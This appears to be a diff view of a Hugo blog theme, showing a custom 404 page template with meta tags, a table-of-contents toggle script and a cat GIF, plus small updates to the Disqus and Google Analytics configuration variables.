{{ define "main"}}

|

||||

<main id="main">

|

||||

<div>

|

||||

<h1 id="title"><a href="{{ .Site.BaseURL | relLangURL }}">Go Home</a></h1>

|

||||

Sorry, this Page is not available.

|

||||

<main id="main" tabindex="-1">

|

||||

|

||||

|

||||

|

||||

<article class="post h-entry">

|

||||

<div class="post-header">

|

||||

<header>

|

||||

<h1 class="p-name post-title"><a href="/">Error 404</a></h1>

|

||||

|

||||

</header>

|

||||

|

||||

|

||||

|

||||

|

||||

<meta property="og:url" content="http://localhost:1313/404/">

|

||||

<meta property="og:site_name" content="Casual Blog">

|

||||

<meta property="og:title" content="[Error 404](/)">

|

||||

<meta property="og:description" content="Hi! Sorry but link doesn’t exist yet.

|

||||

It may be still in work or not posted yet.

|

||||

If this link doesn’t work for 1+ weeks, please contact me!">

|

||||

<meta property="og:locale" content="en_us">

|

||||

<meta property="og:type" content="article">

|

||||

|

||||

|

||||

<meta name="twitter:card" content="summary">

|

||||

<meta name="twitter:title" content="[Error 404](/)">

|

||||

<meta name="twitter:description" content="Hi! Sorry but link doesn’t exist yet.

|

||||

It may be still in work or not posted yet.

|

||||

If this link doesn’t work for 1+ weeks, please contact me!">

|

||||

|

||||

|

||||

<div class="post-info noselect">

|

||||

|

||||

|

||||

<a class="post-hidden-url u-url" href="http://localhost:1313/404/">http://localhost:1313/404/</a>

|

||||

<a href="http://localhost:1313/" class="p-name p-author post-hidden-author h-card" rel="me">Casual</a>

|

||||

|

||||

|

||||

<div class="post-taxonomies">

|

||||

|

||||

|

||||

|

||||

</div>

|

||||

</div>

|

||||

|

||||

</div>

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

<script>

|

||||

document.querySelector(".toc").addEventListener("click", function (event) {

|

||||

if (event.target.tagName !== "A") {

|

||||

event.preventDefault();

|

||||

if (this.open) {

|

||||

this.open = false;

|

||||

this.classList.remove("expanded");

|

||||

} else {

|

||||

this.open = true;

|

||||

this.classList.add("expanded");

|

||||

}

|

||||

}

|

||||

});

|

||||

</script>

|

||||

|

||||

<div class="content e-content">

|

||||

<p>Hi! Sorry but link doesn’t exist yet.</p>

|

||||

<p><img src="https://media1.tenor.com/m/3rAtEcJ09BcAAAAC/cat-loading.gif" alt=""></p>

|

||||

<!-- TODO download, upscale, host here - https://tenor.com/view/cat-loading-error-gif-19814836-->

|

||||

<p>It may be still in work or not posted yet.</p>

|

||||

<p>If this link doesn’t work for 1+ weeks, please contact me!</p>

|

||||

<!-- -->

|

||||

<!-- -->

|

||||

<!-- -->

|

||||

<!-- [Take me home!](/) -->

|

||||

<!-- thanks https://moonbooth.com/hugo/custom-404/ for guide -->

|

||||

|

||||

</div>

|

||||

|

||||

</article>

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

|

||||

</main>

|

||||

|

||||

{{ end }}

|

||||

@ -1,4 +1,4 @@

|

||||

{{ if .Site.DisqusShortname }}

|

||||

{{ if .Site.Config.Services.Disqus.Shortname }}

|

||||

{{ partial "disqus.html" . }}

|

||||

{{ end }}

|

||||

|

||||

|

||||

@ -87,7 +87,7 @@

|

||||

<meta property="article:tag" content="">

|

||||

<meta property="article:publisher" content="https://www.facebook.com/XXX"> -->

|

||||

|

||||

{{ if and (.Site.GoogleAnalytics) (hugo.IsProduction) }}

|

||||

{{ if and (.Site.Config.Services.GoogleAnalytics.ID) (hugo.IsProduction) }}

|

||||

{{ template "_internal/google_analytics.html" . }}

|

||||

{{ end }}

|

||||

|

||||

|

||||
